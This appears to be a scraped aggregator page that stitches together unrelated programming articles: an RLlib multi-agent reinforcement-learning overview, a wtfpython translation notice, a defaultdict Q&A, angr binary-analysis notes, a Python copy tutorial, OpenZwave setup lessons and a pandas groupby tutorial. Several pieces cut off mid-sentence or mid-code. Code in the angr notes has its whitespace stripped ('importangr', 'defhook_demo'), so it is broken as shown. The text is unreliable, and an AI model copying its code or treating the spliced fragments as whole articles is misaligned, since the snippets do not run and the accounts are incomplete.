对问题的分解更具有可解释性 。举个例子,假设现在需要在城市环境中训练 蜂窝天线仰角控制 的策略。一种方案是训练一个“超级智能体”在城市中控制所有的蜂窝天线,另一种方案是将每个天线建模成分离的智能体,后者显然更加合理。因为只有相邻的天线和用户观测到的天线需要彼此互联,而其他个体之间则不需要复杂的响应机制。 对于可扩展性的潜力: 首先,将一个庞大的、复杂的单一智能体分解为多个简单的智能体不仅可以减少输入和输出的维度,同时也可以有效的增加每次迭代过程中训练数据的输入数量。其次,对每个智能体的操作和观测空间进行分区,可以起到与 时域抽象方法 类似的作用,该方法成功地在单智能体策略中 提高 了学习效率。相对地,类似的分级方法可以显式地实现为多智能体系统。最后,好的分解策略可以对环境变化具有更好的鲁棒性,例如,单一的超智能体很容易对某个特定环境产生过拟合。
伯克利开源工具库 RLib 现已支持大规模多智能体强化学习
图 1:单智能体方法(a)和(b)与多智能体强化学习(c)。 一些多智能体应用的例子:

减少交通拥堵 :事实证明, 智能化控制 少数自动驾驶车辆的速度,我们可以大幅增加交通流量。多智能体是这种自动化策略的基础,因为在 混合自动化 系统中,将交通信号灯和车辆建模为单个智能体是不现实的,因为这需要在一个广泛区域内的所有智能体之间同步所有的观测值和行为。


伯克利开源工具库 RLib 现已支持大规模多智能体强化学习
图 2: 交通流量模拟 ,上图为没有自动驾驶车辆的情况,下图为有自动驾驶车辆的情况。

天线仰角控制 :可以根据本地环境的用户分布和拓扑结构来优化蜂窝基站的联合配置。每个基站可以被建模为覆盖城市的多个智能体之一。


伯克利开源工具库 RLib 现已支持大规模多智能体强化学习
图 3:天线仰角控制系统

OpenAI Five :Dota 2 AI 智能体经过训练,可以相互协调并与人类对抗。五个 AI 玩家中的每一个都作为单独的神经网络策略实施,并与大规模 PPO 一起训练。


伯克利开源工具库 RLib 现已支持大规模多智能体强化学习
图 4:电脑玩家进行 Dota 2 游戏 介绍 RLib 中的多智能体支持

本文主要针对 RLib 中的通用多智能体支持进行介绍,包括与 Rlib 中的大多数 分布式算法 (A2C/A3C、PPO、IMPALA、DQN、DDPG 和 Ape-X)的兼容性介绍。本文还讨论了多智能体强化学习面临的挑战,并展示了如何使用现有算法训练多智能体策略,同时还提供了针对非平稳环境和环境变化较多情况下的 特定算法 的实现。

由于当前可供使用的多智能体强化学习库几乎没有,这就增加了基于多智能体方法的实验成本。在科研和应用两个领域中,RLib 希望减少从单智能体模式转为多智能体模式的矛盾并简化转变过程。

为什么支持多智能体很困难

为类似强化学习这种快速发展的领域开发软件是极具挑战性的,多智能体强化学习更甚之。这一工作的难点主要是针对处理多智能体学习中出现的核心问题的技术。

举个例子:非平稳环境。在下图中,红色智能体的目标是学习如何调节整个交通流的速度。蓝色智能体则只学习如何最小化它自己的行进时间。红色智能体可以通过简单地以所需速度驾驶来实现其目标。然而,在多智能体环境中,其他智能体将会学习如何达到其目标――例如蓝色智能体通过绕行以缩短其时间。这是有问题的,因为从单智能体的视角来看(例如图中红色智能体),蓝色智能体也是“环境的一部分”。事实上,从单智能体视角来看,环境的动态变化违反了马尔可夫假设,而在 Q-learning 算法例如 DQN 中,这是整个算法设计的前提。


伯克利开源工具库 RLib 现已支持大规模多智能体强化学习
图 5:环境中的非平稳过程:最开始在(a)中,红色智能体通过减速来控制整个交通流的速度。然而,紧接着蓝色智能体会学习绕过红色智能体(b),这时,红色智能体的处理机制将无法有效的应对当前环境。

针对上述情况,很多算法被提出,例如 LOLA、RIAL 和 Q-MIX。 从高层面讲,强化学习模型的训练过程中,这些算法会考虑其他智能体的行为。通常是在训练阶段部分集中化,在执行阶段分散化处理。在实现方面,这意味着策略网络之间是彼此依赖的,例如,Q-MIX 算法中的网络混合:


伯克利开源工具库 RLib 现已支持大规模多智能体强化学习
图 6:Q-MIX 混合网络结构,具体可参考: QMIX: Monotonic Value Function Factorisation for Deep Multi-Agent Reinforcement Learning 。独立的 Q- 估测通过单调的混合网络进行累积,从而高效地进行最终行为的计算。

类似地,基于梯度策略的算法例如 A3C 和 PPO 等,可能无法兼容多智能体配置。因为随着智能体数量的增加,置信度评价将变得越来越困难。考虑下图中这种多智能体的所处的情况。可以看出,随着智能体数量的增加,对智能体的激励与其行为的相关性将会越来越小。此时,交通速度已经降为了 0,但是智能体并不能作出正确的响应以打破僵局。


伯克利开源工具库 RLib 现已支持大规模多智能体强化学习
图 7:复杂情况下的优势估测:在上图的交通阻塞情况中,难以判断哪个智能体是主要原因,在阻塞情况被解决后,同样无法确定应当给哪个智能体分配更高的置信度。

一类方法通过中心化值函数(如图 8 中的“Q”框)来模拟其他智能体对环境中的影响,MA-DDPG 则使用了这种方法。直观地讲,通过统计其他智能体的行为,可以有效减少对每个智能体进行优势估计时的变化性。


伯克利开源工具库 RLib 现已支持大规模多智能体强化学习
图 8:MA-DDPG 基本框架,选自 Multi-Agent Actor-Critic for Mixed Cooperative-Competitive Environments 。在执行阶段,仅使用局部信息,但在训练阶段需要使用全局信息进行优化。

到这里,本文已经介绍了研究多智能体强化学习所面临的两大挑战与解决策略。在很多情况下,使用单智能体强化学习算法训练多智能策略可以取得不错的结果。例如,OpenAI Five 就是利用了大规模 PPO 和 特殊化网络模型 的组合。

在 RLib 中训练多智能体

那么,在多智能体设置中如何使用特殊化算法与单智能体强化学习?RLib 为此设计了简单易行的 方法 。相关细则如下:

策略被表示为对象:在 RLib 中,所有的基于梯度的算法都会声明一个策略图对象,该对象包含一个策略模型πθ(ot) 和一个 轨迹后处理函数 postθ(traj) 以及策略损失 L(θ; X)。 该策略图 对象为分布式框架提供了足够的内容与功能以执行环境部署(通过检索πθ)、 经验整理 (通过应用 postθ)以及策略优化(通过减小策略损失)。

策略对象是黑箱:为了支持多智能体配置,在每个环境中,RLib 仅管理多个策略图的创建与执行,并在 策略优化 过程中对他们的损失进行累计。在 RLib 中,策略图对象通常被当成黑箱,这就意味着可以用任何框架(包括 TensorFlow 和 PyTorch)来实现它们。此外,策略图可以在内部共享变量和层以实现 Q-MIX 和 MA-DDPG 等算法,而不需要特殊的框架支持。

更了更具体的说明这些细则,接下来的几节将介绍一些 RLlib 中的多智能体 API 来执行大规模多智能体训练的代码示例。

多智能体环境模型

由于不确定标准的多智能体环境借口,因此 RISELab 将 这个多智能体环境模型 编写为 Gym 接口 的直接扩展。在多智能体环境中,每一步会存在多种行为实体。图 6 所示的是一种交通控制场景,其中多个可控实体(例如,交通灯、自动驾驶车辆)一起工作以减少高速公路拥堵。

在该场景中:

每个智能体都可以在不同的时间尺度上作出响应(即,异步工作)。 智能体会随时间进出该环境。
伯克利开源工具库 RLib 现已支持大规模多智能体强化学习
图 9:RLib 多智能体环境可以模拟多个独立智能体随时间进出环境的情况。不同的智能体可以被赋予不同的策略。

下面这段代码是使用 MultiAgentEnv 接口的一个示例,该接口可以从多个就绪的智能体中返回观测值和激励:

复制代码

# 示例:使用多智能体环境 > env = MultiAgentTrafficEnv(num_cars=20,num_traffic_lights=5) # 观测值是字典形式的,不是每一个智能体都需要在每个时间点被表示于字典中。 >print(env.reset()) { "car_1": [[...]], "car_2": [[...]], "traffic_light_1": [[...]], } # 每个智能体都需要定义一个行为来返回他们的观测值 > new_obs, rewards, dones, infos = env.step( actions={"car_1":...,"car_2":...}) # 同样的,新的观测值,激励,完成的,信息等也是字典形式 >print(rewards) {"car_1":3,"car_2":-1,"traffic_light_1":0} # 独立的智能体可以早早离开 ; 当 "__al

这个Python资源在GitHub上标星超8000,现在被翻译成了中文

$
0
0

最近,GitHub上一个关于python的工程完工了。

一个名为“暮晨”的贡献者,把一个非常有趣的Python项目,翻译成了中文版。

这个项目是《What the f*ck Python!》,专门介绍 Python 里面那些奇奇怪怪的语言坑。


这个Python资源在GitHub上标星超8000,现在被翻译成了中文
关于项目

项目的主体构成部分就是示例,一共分为5个部分,分别是:

Strain your brain!/大脑运动!


这个Python资源在GitHub上标星超8000,现在被翻译成了中文

Appearances are deceptive!/外表是靠不住的!


这个Python资源在GitHub上标星超8000,现在被翻译成了中文

Watch out for the landmines!/小心地雷!


这个Python资源在GitHub上标星超8000,现在被翻译成了中文

The Hidden treasures!/隐藏的宝藏!


这个Python资源在GitHub上标星超8000,现在被翻译成了中文

Miscellaneous/杂项


这个Python资源在GitHub上标星超8000,现在被翻译成了中文

以上,总计51个示例。

每一个示例的结构都是一样的,以“Mutating the immutable!/强人所难”为例:

首先,会给出代码:

some_tuple = ("A", "tuple", "with", "values") another_tuple = ([1, 2], [3, 4], [5, 6])

然后,给出Output( Python version):

>>> some_tuple[2] = "change this" TypeError: 'tuple' object does not support item assignment >>> another_tuple[2].append(1000) # 这里不出现错误 >>> another_tuple ([1, 2], [3, 4], [5, 6, 1000]) >>> another_tuple[2] += [99, 999] TypeError: 'tuple' object does not support item assignment >>> another_tuple ([1, 2], [3, 4], [5, 6, 1000, 99, 999])

然后,对意外输出的结果进行简短的描述,在这个示例中,就是:

我还以为元组是不可变的呢…

接下来,就会对示例进行说明,简要叙述发生了什么以及为什么会发生。如有必要, 也会举例说明。

在这个示例中是这样的:

引用 https://docs.python.org/2/reference/datamodel.html

不可变序列 不可变序列的对象一旦创建就不能再改变。(如果对象包含对其他对象的引用,则这些其他对象可能是可变的并且可能会被修改; 但是,由不可变对象直接引用的对象集合不能更改。)

+= 操作符在原地修改了列表. 元素赋值操作并不工作, 但是当异常抛出时, 元素已经在原地被修改了。

有些地方,贡献者还会给出译注,比如整个示例中就是:

对于不可变对象, 这里指tuple, +=并不是原子操作, 而是extend和=两个动作, 这里=操作虽然会抛出异常, 但 extend 操作已经修改成功了。

其他还有50个示例,等你来看~

怎么使用?

当然,要学习一下怎么使用这个资源。项目贡献者在用法部分表示,最好依次阅读下面的示例。

然后,在阅读每一个示例的时候,这样做:

仔细阅读设置例子最开始的代码。阅读输出结果。确认结果是否如你所料。确认你是否知道这背后的原理。如果不知道, 深呼吸然后阅读说明 (如果你还是看不明白, 别沉默!可以提问题)。如果知道, 给自己点奖励, 然后去看下一个示例。

此外,还可以在命令行阅读 WTFpython,有 pypi 包 和 npm 包(支持代码高亮),不过都是英文版的。

关于作者

这个项目的原作者,是一个名为Satwik Kansal的印度小哥。


这个Python资源在GitHub上标星超8000,现在被翻译成了中文

GitHub上的介绍称,在深度学习和去中心化应用方面是一个“老司机”。

目前,英文版资源,标星已经8.3k了。


这个Python资源在GitHub上标星超8000,现在被翻译成了中文
传送门

中文版:

https://github.com/leisurelicht/wtfpython-cn

英文原版:

https://github.com/satwikkansal/wtfpython

List of three tuples to a dictionary from the list of lists

$
0
0

I need the first item in the each tuple to be the key that returns a list of lists of the corresponding items. For example...

This is my input data:

my_problem = [(1,20,400), (1,30,450), (2,40,525), (2,50,600), (2,70,680),(3,80,700), (3,90,980)]

This is what I'm trying to achieve:

my_solution = {'1': [[20,400],[30,450]], '2': [[40,525],[50,600],[70,680]], '3': [[80,700], [90,980]]}

My actual list has thousands of these tuples of varying lengths.

Use a defaultdict . These nice structures are essentially dictionaries that can be initialised with a default value when inserting a key:

from collections import defaultdict solution = defaultdict(list) # create defaultdict with default value [] for item in my_problem: solution[item[0]].append(list(item[1:]))

and to convert back to a dictionary (although this is unncessary, as a defaultdict already has the behaviour of a regular dictionary) you can do

my_solution = dict(solution) A Slightly Neater Formulation in python 3

(kudos to tobias_k for pointing this out)

In Python 3, you can replace the ugly item[0] , etc. calls to use the following: solution = defaultdict(list) for first, *rest in my_problem: solution[first].append(rest)

angr学习笔记

$
0
0
前言

angr是一个基于符号执行和模拟执行的二进制框架,可以用在很多的场景,比如逆向分析,漏洞挖掘等。本文对他的学习做一个总结。

安装

这里介绍ubuntu下的安装,其他平台可以看 官方文档

首先安装一些依赖包

sudoapt-getinstallpython-devlibffi-devbuild-essentialvirtualenvwrapper

然后使用

mkvirtualenvangr&&pipinstallangr

即可安装

建议使用virtualenv来安装,因为angr用到的一些库和正常下的不一样,直接pip安装可能会安装不上去

angr常用对象及简单使用

使用angr的大概步骤

创建project

设置state

新建 符号量 :BVS (bitvector symbolic )或BVV (bitvector value)

把符号量设置到内存或者其他地方

设置Simulation Managers, 进行路径探索的对象

运行,探索满足路径需要的值

约束求解,获取执行结果

Project对象 介绍与简单使用

载入二进制文件使用angr.Project函数,它的第一个参数是待载入文件的路径,后面还有很多的可选参数,具体可以看 官方文档

p=angr.Project('./issue',load_options={"auto_load_libs":False})

auto_load_libs设置是否自动载入依赖的库,如果设置为True的话会自动载入依赖的库,然后分析到库函数调用时也会进入库函数,这样会增加分析的工作量,也有能会跑挂。

载入文件后,就可以通过project对象获取信息以及进行后面的操作

In[11]:proj=angr.Project('/bin/true') In[12]:proj.loader.shared_objects Out[12]:OrderedDict([('true',<ELFObjecttrue,maps[0x400000:0x6063bf]>),(u'libc.so.6',<ELFObjectlibc-2.23.so,maps[0x1000000:0x13c999f]>),(u'ld-linux-x86-64.so.2',<ELFObjectld-2.23.so,maps[0x2000000:0x2227167]>)]) In[13]:proj=angr.Project('/bin/true',load_options={"auto_load_libs":False}) In[14]:proj.loader.shared_objects Out[14]:OrderedDict([('true',<ELFObjecttrue,maps[0x400000:0x6063bf]>)]) In[15]:

可以看到在使用{"auto_load_libs": False}后一些动态链接库没有被载入。

有两个小点还需要了解一下

如果auto_load_libs为true, 那么程序如果调用到库函数的话就会直接调用真正的库函数,如果有的库函数逻辑比较复杂,可能分析程序就出不来了~~。同时angr使用python实现了很多的库函数(保存在angr.SIM_PROCEDURES里面),默认情况下会使用列表内部的函数来替换实际的函数调用,如果不在列表内才会进入到真正的library.

如果auto_load_libs为false, 程序调用函数时,会直接返回一个 不受约束的符号值。

hook

我们可以在angr中使用hook来把指定地址的二进制代码替换为python代码。angr在模拟执行程序时,执行每一条指令前会检测该地址处是否已经被hook,如果是就不执行这条语句,转而执行hook时指定的python处理代码。

下面看实例

目标程序地址

https://github.com/angr/angr-doc/tree/master/examples/sym-write

示例脚本

#!/usr/bin/envpython #coding=utf-8 importangr importclaripy defhook_demo(state): state.regs.eax=0 state.regs.ebx=0xdeadbeef p=angr.Project("./examples/sym-write/issue",load_options={"auto_load_libs":False}) p.hook(addr=0x08048485,hook=hook_demo,length=2) state=p.factory.blank_state(addr=0x0804846B,add_options={"SYMBOLIC_WRITE_ADDRESSES"}) u=claripy.BVS("u",8) state.memory.store(0x0804A021,u) sm=p.factory.simgr(state) sm.explore(find=0x080484DB) st=sm.found[0] printhex(st.se.eval(st.regs.ebx))

介绍一下脚本的流程

首先 使用angr.Project载入文件, 设置auto_load_libs为false则不加载依赖的lib

然后 使用p.hook把0x08048485处的2字节的指令 为hook_demo,之后执行0x08048485就会去执行hook_demo

然后创建一个state,因为要往内存里面设置 符号量 (BVS),设置SYMBOLIC_WRITE_ADDRESSES

然后新建一个8位长度的符号量,并把它存到0x0804A021(全局变量u的位置)


angr学习笔记

然后开始探索路径,最后求解出使得 程序执行到you win代码块的符号量的解。


angr学习笔记

这里主要讲p.hook的处理, 这里使用了hook函数的三个参数

p.hook(addr=0x08048485,hook=hook_demo,length=2)

addr为待hook指令的地址

hook为hook的处理函数,在执行到addr时,会执行 这个函数,同时把 当前的state对象作为参数传递过去

length为 待hook指令的长度,在 执行完hook函数以后,angr需要根据length来跳过这条指令,执行下一条指令

在上面的示例中,hook了0x08048485处的指令


angr学习笔记

这是一条xor eax, eax的指令,长度为2.

defhook_demo(state): state.regs.eax=0 state.regs.ebx=0xdeadbeef

为了做示范,这里就是把eax设置为0(xor eax,eax的作用), 然后 设置ebx为0xdeadbeef, 因为后续不会用到ebx, 修改它可以在路径探索完后查看这个值是否符合预期。


angr学习笔记

可以看到ebx被修改成了0xdeadbeef。

SimState对象

这个对象保存着程序运行到某一阶段的状态信息。

通过这个对象可以操作某一运行状态的上下文信息,比如内存,寄存器等

创建state In[8]:p=angr.Project("./hello_angr") In[9]:st=p.factory.entry_state() In[10]:st.regs.rsp Out[10]:<BV640x7fffffffffeff98> In[11]:st Out[11]:<SimState@0x4004a0> In[12]:

首先加载二进制分析文件,创建project对象,然后创建一个entry_state, 之后就可以通过 这个state对象,获取或者修改此时程序的运行状态

entry_state: 做一些初始化工作,然后在 程序的 入口停下


angr学习笔记

还有一个用的比较多的是

st=p.factory.blank_state(addr=0x4004a0)

这会创建一个blank_state对象,这个对象里面很多东西都是未初始化的,当程序访问未初始化的数据时,会返回一个不受约束的符号量

基本操作

state对象一般是作为符号执行开始前创建用来 为 后续的执行 初始化一些数据,比如栈状态,寄存器值。

或者在路径探索结束后 ** 返回一个state对象供用户提取需要的值或进行 **约束求解,解出到达目标分支所使用的符号量的值。

访问寄存器

通过state.regs对象的属性访问以及修改寄存器的数据

In[12]:state.regs.r state.regs.r10state.regs.r14state.regs.raxstate.regs.rdistate.regs.rip state.regs.r11state.regs.r15state.regs.rbpstate.regs.rdxstate.regs.rsi state.regs.r12state.regs.r8state.regs.rbxstate.regs.register_defaultstate.regs.rsp state.regs.r13state.regs.r9state.regs.rcxstate.regs.rflags #获取rip的值 In[12]:state.regs.rip Out[12]:<BV640x400470> #获取rsp的值 In[13]:state.regs.rsp Out[13]:<BV640x7fffffffffeff78> #获取rbp的值 In[14]:state.regs.rbp Out[14]:<BV64reg_38_36_64{UNINITIALIZED}> #设置rbp=rsp+0x40 In[15]:state.regs.rbp=state.regs.rsp+0x40 In[16]:state.regs.rbp Out[16]:<BV640x7fffffffffeffb8> #对于BVV和BVS都需要通过solver进行求解得到具体的值 In[26]:hex(state.se.eval(state.regs.rbp)) Out[26]:'0x7fffffffffeffb8L' In[27]:hex(state.solver.eval(state.regs.rbp)) Out[27]:'0x7fffffffffeffb8L' 访问内存

有两种方式访问内存,一个是通过state.mem使用数组索引类似的方式进行访问

In[64]:state.mem[state.regs.rsp].qword Out[64]:<uint64_t<BV640x2>at0x7fffffffffeff78> In[65]:state.mem[state.regs.rsp].qword=0xdeadbeefdeadbeef In[66]:state.mem[state.regs.rsp].qword Out[66]:<uint64_t<BV640xdeadbeefdeadbeef>at0x7fffffffffeff78> In[67]:m=state.mem[state.regs.rsp] In[68]:m. m.STRONGREF_STATEm.doublem.int32_tm.register_defaultm.ssizem.uint32_tm.wstring m.arraym.dwordm.int64_tm.resolvablem.ssize_tm.uint64_t m.bytem.examplem.int8_tm.resolvedm.statem.uint8_t m.charm.floatm.longm.set_statem.storem.ui

Python 拓展之详解深拷贝和浅拷贝

$
0
0

首先我在这介绍两个新的小知识,要在下面用到。一个是函数 id() ,另一个是运算符 is。id() 函数就是返回对象的内存地址;is 是比较两个变量的对象引用是否指向同一个对象,在这里请不要和 == 混了,== 是比较两个变量的值是否相等。

>>> a = [1,2,3] >>> b = [1,2,3] >>> id(a) 38884552L >>> a is b False >>> a == b True 复制代码

copy 这个词有两种叫法,一种是根据它的发音音译过来的,叫拷贝;另一种就是标准的翻译,叫复制。

其实单从表面意思来说,copy 就是将某件东西再复制一份,但是在很多编程语言中,比如 python,C++中,它就不是那么的简单了。

>>> a = 1 >>> b = a >>> b 1 复制代码

看到上面的例子,从表面上看我们似乎是得到了两个 1,但是如果你看过我之前写的文章,你应该对一句话有印象,那就是 “变量无类型”, Python 中变量就是一个标签,这里我们有请 id() 闪亮登场,看看它们在内存中的位置。

>>> a = 1 >>> b = a >>> b 1 >>> id(a) 31096808L >>> id(b) 31096808L 复制代码

看出来了吗,id(a) 和 id(b) 相等,所以并没有两个 1,只是一个 1 而已,只不过是在 1 上贴了两张标签,名字是 a 和 b 罢了,这种现象普遍存在于 Python 之中,这种赋值的方式实现了 “假装” 拷贝,真实的情况还是两个变量和同一个对象之间的引用关系。

我们再来看 copy() 方法:

>>> a = {'name':'rocky','like':'python'} >>> b = a.copy() >>> b {'name': 'rocky', 'like': 'python'} >>> id(a) 31036280L >>> id(b) 38786728L 复制代码

咦,果然这次得到的 b 和原来的 a 不同,它是在内存中又开辟了一个空间。那么我们这个时候就来推理了,虽然它们两个是一样的,但是它们在两个不同的内存空间里,那么肯定彼此互不干扰,如果我们去把 b 改了,那么 a 肯定不变。

>>> b['name'] = 'leey' >>> b {'name': 'leey', 'like': 'python'} >>> a {'name': 'rocky', 'like': 'python'} 复制代码

结果和我们上面推理的一模一样,所以理解了对象有类型,变量无类型,变量是对象的标签,就能正确推断出 Python 提供的结果。

我们接下来在看一个例子,请你在往下看的时候保证上面的你已经懂了,不然容易晕车。

>>> a = {'name':'rocky','like':'python'} >>> b = a >>> b {'name': 'rocky', 'like': 'python'} >>> b['name'] = 'leey' >>> b {'name': 'leey', 'like': 'python'} >>> a {'name': 'leey', 'like': 'python'} 复制代码

上面的例子看出什么来了吗?修改了 b 对应的字典类型的对象,a 的对象也变了。也就是说, b = a 得到的结果是两个变量引用了同一个对象,但是事情真的这么简单吗?请睁大你的眼睛往下看,重点来了。

>>> first = {'name':'rocky','lanaguage':['python','c++','java']} >>> second = first.copy() >>> second {'name': 'rocky', 'lanaguage': ['python', 'c++', 'java']} >>> id(first) 31036280L >>> id(second) 38786728L 复制代码

在这里的话没有问题,和我们之前说的一样,second 是从 first 拷贝过来的,它们分别引用的是两个对象。

>>> second['lanaguage'].remove('java') >>> second {'name': 'rocky', 'lanaguage': ['python', 'c++']} >>> first {'name': 'rocky', 'lanaguage': ['python', 'c++']} 复制代码

发现什么了吗?按理说上述例子中 second 的 lanaguage 对应的是一个列表,我删除这个列表里的值,也只应该改变的是 second 啊,为什么连 first 的也会改,不是应该互不干扰吗?是不是很意外?是我们之前说的不对吗?那我们再试试另一个键:

>>> second['name'] = 'leey' >>> second {'name': 'leey', 'lanaguage': ['python', 'c++']} >>> first {'name': 'rocky', 'lanaguage': ['python', 'c++']} 复制代码

前面说的原理是有效的,那这到底是为什么啊,来来来,有请我们的 id() 再次闪亮登场。

>>> id(first['name']) 38829152L >>> id(second['name']) 38817544L >>> id(first['lanaguage']) 38754120L >>> id(second['lanaguage']) 38754120L 复制代码

其实这里深层次的原因是和 Python 的存储数据的方式有关,这里不做过多的说明(其实是我也不懂。。 在这里,我们只需要知道的是,当 copy() 的时候,列表这类由字符串,数字等复合而成的对象仍然是复制了引用,也就是贴标签,并没有建立一个新的对象,我们把这种拷贝方式叫做浅拷贝(唉呀妈呀,终于把这个概念引出来了。。,言外之意就是并没有解决深层次的问题,再言外之意就是还有能够解决深层次问题的方法。

确实,在 Python 中还有一个深拷贝(deep copy),在使用它之前要引入一个 copy 模块,我们来试一下。

>>> import copy >>> first = {'name':'rocky','lanaguage':['python','c++','java']} >>> second = copy.deepcopy(first) >>> second {'name': 'rocky', 'lanaguage': ['python', 'c++', 'java']} >>> second['lanaguage'].remove('java') >>> second {'name': 'rocky', 'lanaguage': ['python', 'c++']} >>> first {'name': 'rocky', 'lanaguage': ['python', 'c++', 'java']} 复制代码

用了深拷贝以后,果然就不是引用了。

Z-Wave : Lessons Learned Python OpenZwave

$
0
0

This article explains a few missing pieces of the puzzle I had when setting up a home automation network using ZWave. Most of this information is available publicly but it took a while to find or to actually make the connection between what I wanted and what I needed to look for in the documentation.

Initial Setup

Hardware:

Raspberry Pi with Aeotec ZWave Stick Gen5 ( https://aeotec.com/z-wave-usb-stick )
Z-Wave : Lessons Learned   Python OpenZwave
Fibaro Motion Sensor ( https://www.fibaro.com/en/products/motion-sensor/ )
Z-Wave : Lessons Learned   Python OpenZwave

Software:

Mozilla Things Gateway ( https://iot.mozilla.org/gateway/ )
Z-Wave : Lessons Learned   Python OpenZwave

Though being relatively new, Things Gateway was impressive. Easy to setup, automatic discovery, worked with all my devices and very extensible.

Digging deeper…

While the documented setup for Things Gateway got me up and running quickly, there were a few things I wanted to fix, mainly the reporting interval of the sensor (read on for why I wanted to change this). Getting there was an interesting journey since the Things Gateway didn’t seem to have a UI that caters for this (yet)

Enter OpenZwave

The Things Gateway backend uses the OpenZwave project , which comes with handy libraries. The one I used was python OpenZwave . After installing this on the RPi, I attempted to run one of the examples api_demo.py , and ran into my first couple of newbie mistakes:

Lesson 1: The Aeotec USB stick emulates a serial device, which means only one process can use it at a time. You have to disable the Things Gateway ZWave adapter before Python OpenZWave can use the stick.

Lesson 2: If some of your ZWave devices are “asleep”, your network will never go into “ready” state. Make sure all your ZWave devices are awake.

The second lesson bears some expanding especially for newbies like me. Most battery powered ZWave devices go into “sleep mode” for extended periods of time to extend battery life, in which period they do not respond to active polls. Instead depending on the type of device they send events (like motion detection) or reports (like sensor values) at periodic intervals. In addition, when asleep the devices will not respond to negotiation requests from your ZWave controller. The longer these sleep periods, the better for battery life at the cost of accuracy of course. Samsung SmartThings has some good documentation expanding on this: https://docs.smartthings.com/en/latest/device-type-developers-guide/z-wave-primer.html

So you may end up in situations like:

The UI of your gateway seems to never refresh it’s values. This is what initially made me want to change the reporting intervals When running the Python API_DEMO example, the “network.STATE_READY’ was never attained, so I got unexpected results. I had to manually wake up the Fibaro Motion sensor (by manually tapping the action button once).

Once past these details, the API_DEMO script should return a whole lot of information, such as:


Z-Wave : Lessons Learned   Python OpenZwave
Advanced Configuration

Changing the sensor configuration is a bit more complicated. We need to interact directly with the ZWave device. Open a python shell and copy/paste:

Most of the above is a modified version from the python-openzwave examples folder

At this stage, the network object will allow you to interact with your network. First step, identify the node you’d like to communicate with:

>> network.nodes
{1: <openzwave.node.ZWaveNode object at 0x76c659d0>, 6: <openzwave.node.ZWaveNode object at 0x764fc610>}
>> network.nodes[6].manufacturer_name
'FIBARO System'

So node number 6 is what I’m after. Now to get to the configuration values. Looking at the documentation for the Fibaro device shows the different configuration parameters:

https://manuals.fibaro.com/content/manuals/en/FGMS-001/FGMS-001-EN-T-v2.1.pdf https://products.z-wavealliance.org/products/2762/configs

So for example:


Z-Wave : Lessons Learned   Python OpenZwave

I’d like to change parameter number “64”. But:

>> network.nodes[6].get_configs()
{}

An empty result. Seems like i’m not the only one to get to this point, but devs say it’s expected… . This gave a clue:

>> network.nodes[6].product_name
Unknown: type=0801, id=1002

It turns out that the ZWave protocol on it’s own does not allow you to “auto-discover” the configuration options available of a device. It needs to know which device it’s talking to in order to know which configuration options that device supports, and it figured out which device it’s talking to from the above “ type ” and “ id ” numbers.

Lesson 3:If you see an “Unknown” node product name like the above exmaple, the type and ID numbers don’t match anything OpenZwave have in their database, and you need to add it manually. Read https://github.com/OpenZWave/open-zwave/wiki/Adding-Devices

Configuring OpenZwave

After going through the above link, first stop is to check the manufacturer_specific.xml file under /usr/etc/openwave for our product type and id. In my case Fibaro seems to have updated their product but OpenZwave hasn’t yet caught up. There was an entry in the XML file that was very close to what I was looking for:

< Product type="0801" id="1001" name="FGMS001-ZW5 Motion Sensor" config="fibaro/fgmszw5.xml"/ >

Double check thefgmszw5.xml file, but in my case it matched the documentation and I was able to simply add a new line in the manufacturer_specific.xml file with the correct type and id I required:

< Product type="0801" id="<strong>1002</strong>" name="FGMS001-ZW5 Motion Sensor" config="fibaro/fgmszw5.xml"/ > I restarted my interactive python script ran network.nodes[6].get_configs() …. and got an empty dictionary again. Lesson 4:Remove any zwcfg_*.xml files you have otherwi

Python Pandas Groupby Tutorial

$
0
0

In this Pandas group by we are going to learn how to organize Pandas dataframes by groups. More specifically, we are going to learn how to group by one and multiple columns. Furthermore, we are going to learn how calculate some basics summary statistics (e.g., mean, median), convert Pandas groupby to dataframe, calculate the percentage of observations in each group, and many more useful things.

More about working with Pandas: Pandas Dataframe Tutorial

First of all we are going to import pandas as pd, and read a CSV file, using the read_csv method, to a dataframe. In the example below, we use index_col=0 because the first row in the dataset is the index column.

import pandas as pd data_url = 'http://vincentarelbundock.github.io/Rdatasets/csv/carData/Salaries.csv' df = pd.read_csv(data_url, index_col=0) df.head()
Python Pandas Groupby Tutorial

We used Pandas head to se the first 5 rows of our dataframe. In the image above we can see that we have, at least, three variables that we can group our data by. That is, we can group our data by “rank”, “discipline”, and “sex”. Of course, we could also group it by yrs.since.phd or yrs.service but it may be a lot of groups. As previously mentioned we are going to use Pandas groupby to group a dataframe based on one, two, three, or more columns.

Data can be loaded from other file formats as well (e.g., Excel, HTML, JSON):

Pandas Excel Tutorial: How to Read and Write Excel Files Explorative Data Analysis with Pandas, SciPy, and Seaborn includes a short introduction to Pandas read_html python Pandas Groupby Example

We are starting with the simplest example; grouping by one column. In the Pandas groupby example below we are going to group by the column “rank”.

There are many different methods that we can use on Pandas groupby objects (and Pandas dataframe objects). All available methods on a Python object can be found using this code:

import IPython # Grouping by one factor df_rank = df.groupby('rank') # Getting all methods from the groupby object: meth = [method_name for method_name in dir(df_rank) if callable(getattr(df_rank, method_name)) & ~method_name.startswith('_')] # Printing the result print(IPython.utils.text.columnize(meth))
Python Pandas Groupby Tutorial

Note, that in the code example above we also import IPython to print the list in columns. In the following examples we are going to use some of these methods. First, we can print out the groups by using the groups method to get a dictionary of groups:

df_rank.groups
Python Pandas Groupby Tutorial

We can also use the groupby method get_group to filter the grouped data. In the next code example we are going to select the Assistant Professor group (i.e., “AsstProf”).

# Get group df_rank.get_group('AsstProf').head()
Python Pandas Groupby Tutorial
Pandas Groupby Count

If we want to find out how big each group is (e.g., how many observations in each group), we can use use .size() to count the number of rows in each group:

df_rank.size() # Output: # # rank # AssocProf 64 # AsstProf67 # Prof 266 # dtype: int64

Additionally, we can also use Pandas groupby count method to count by group(s) and get the entire dataframe. If we don’t have any missing values the number should be the same for each column and group. Thus, this is a way we can explore the dataset and see if there are any missing values in any column.

df_rank.count()
Python Pandas Groupby Tutorial

That was how to use Pandas size to count the number of rows in each group. We will return to this, later, when we are grouping by multiple columns. Now we are going to In some cases we may want to find out the number of unique values in each group. This can be done using the groupby method nunique :

df_rank.nunique()
Python Pandas Groupby Tutorial

